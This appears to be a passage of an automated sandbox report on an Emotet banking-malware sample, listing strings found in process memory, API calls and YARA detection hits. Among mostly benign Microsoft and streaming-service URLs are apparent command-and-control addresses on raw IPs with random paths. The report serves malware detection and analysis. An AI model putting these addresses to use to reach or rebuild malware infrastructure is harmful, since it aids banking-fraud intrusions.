Source: svchost.exe, 00000021.00000003.571824588.000002A23118D000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
Source: svchost.exe, 00000021.00000003.571841091.000002A23119E000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.571824588.000002A23118D000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 00000021.00000003.571841091.000002A23119E000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.571824588.000002A23118D000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab

Source: rundll32.exe, 0000000A.00000003.287573549.000000000355C000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762587120.000000000355C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.603169778.0000023DBF886000.00000004.00000001.sdmp, svchost.exe, 00000021.00000002.587498496.000002A231119000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000000C.00000002.603169778.0000023DBF886000.00000004.00000001.sdmp, svchost.exe, 00000021.00000002.587230521.000002A2308E8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: rundll32.exe, 0000000A.00000003.287573549.000000000355C000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762587120.000000000355C000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.10.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000003.284605285.0000000005B24000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4bff1f73ae559
Source: rundll32.exe, 0000000A.00000003.287573549.000000000355C000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762587120.000000000355C000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
Source: rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enn
Source: svchost.exe, 00000021.00000003.568374017.000002A23116C000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567636049.000002A231196000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567551923.000002A231602000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567736212.000002A231621000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567519693.000002A231186000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567531380.000002A231196000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 00000010.00000002.307173784.000001B50CE13000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000000E.00000002.761004522.000002866503E000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000E.00000002.761004522.000002866503E000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	String found in binary or memory: https://45.138.98.34/
Source: rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	String found in binary or memory: https://45.138.98.34/1
Source: rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	String found in binary or memory: https://45.138.98.34:80/qIFNheLVNvvPNSNxkwhjxonGRMtffKSDvVT
Source: rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	String found in binary or memory: https://69.16.218.101/
Source: rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	String found in binary or memory: https://69.16.218.101/T
Source: rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	String found in binary or memory: https://69.16.218.101:8080/NkSVeNqehcFPnIYSRqyWkDgFYPfQVpAkO
Source: rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	String found in binary or memory: https://69.16.218.101:8080/NkSVeNqehcFPnIYSRqyWkDgFYPfQVpAkON
Source: svchost.exe, 0000000E.00000002.761004522.000002866503E000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000E.00000002.761004522.000002866503E000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000E.00000002.761004522.000002866503E000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000010.00000003.306825607.000001B50CE49000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000010.00000002.307226516.000001B50CE3D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000010.00000003.306756140.000001B50CE67000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.307290539.000001B50CE69000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000010.00000003.306805584.000001B50CE4D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.307252680.000001B50CE4E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000010.00000002.307226516.000001B50CE3D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000010.00000003.306889893.000001B50CE41000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.307239059.000001B50CE42000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306854743.000001B50CE40000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000010.00000003.306889893.000001B50CE41000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.307239059.000001B50CE42000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306854743.000001B50CE40000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000010.00000003.306854743.000001B50CE40000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.307245662.000001B50CE4B000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306825607.000001B50CE49000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
Source: svchost.exe, 00000021.00000003.568374017.000002A23116C000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567636049.000002A231196000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567551923.000002A231602000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567736212.000002A231621000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567519693.000002A231186000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567531380.000002A231196000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000010.00000003.306825607.000001B50CE49000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000010.00000002.307245662.000001B50CE4B000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306825607.000001B50CE49000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000010.00000002.307245662.000001B50CE4B000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306825607.000001B50CE49000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000010.00000002.307252680.000001B50CE4E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000010.00000002.307226516.000001B50CE3D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000010.00000002.307226516.000001B50CE3D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000010.00000002.307173784.000001B50CE13000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.307226516.000001B50CE3D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000010.00000003.306854743.000001B50CE40000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306884229.000001B50CE45000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000010.00000003.306854743.000001B50CE40000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306884229.000001B50CE45000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000010.00000002.307214272.000001B50CE39000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000010.00000002.307173784.000001B50CE13000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 00000021.00000003.568374017.000002A23116C000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567636049.000002A231196000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567551923.000002A231602000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567736212.000002A231621000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567519693.000002A231186000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567531380.000002A231196000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000021.00000003.568374017.000002A23116C000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567636049.000002A231196000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567551923.000002A231602000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567736212.000002A231621000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567519693.000002A231186000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567531380.000002A231196000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000021.00000003.568771357.000002A2311AD000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.568746551.000002A2311AD000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.568828899.000002A231602000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.568808654.000002A231196000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.568796159.000002A231185000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_100012D0 recvfrom,

3_2_100012D0

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000FF59 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		3_2_1000FF59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000FF59 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		4_2_1000FF59

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 10.2.rundll32.exe.5d70000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.23d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5790000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ed0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5480000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4e90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5fd0000.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.53f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.51a0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3360000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.40d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5aa0000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.51d0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.54f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.36e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5020000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5340000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4ff0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4850000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5600000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.54f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5050000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.55d0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5730000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.2790000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4db0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5310000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5450000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4df0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.57c0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5c70000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4d60000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4cc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5870000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4fc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5a70000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3070000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5520000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.59c0000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5730000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.6000000.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3330000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5da0000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5d70000.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.26d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5990000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5870000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.53f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3330000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5790000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4e60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.58a0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5a70000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5990000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5450000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5020000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.51a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.23d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4d60000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.26d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5760000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5c70000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5ca0000.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5420000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3070000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ed0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5fd0000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.55d0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4e60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4fc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.247708165.0000000004ED0000.00000040.00000001.sdmp, type: MEMORY
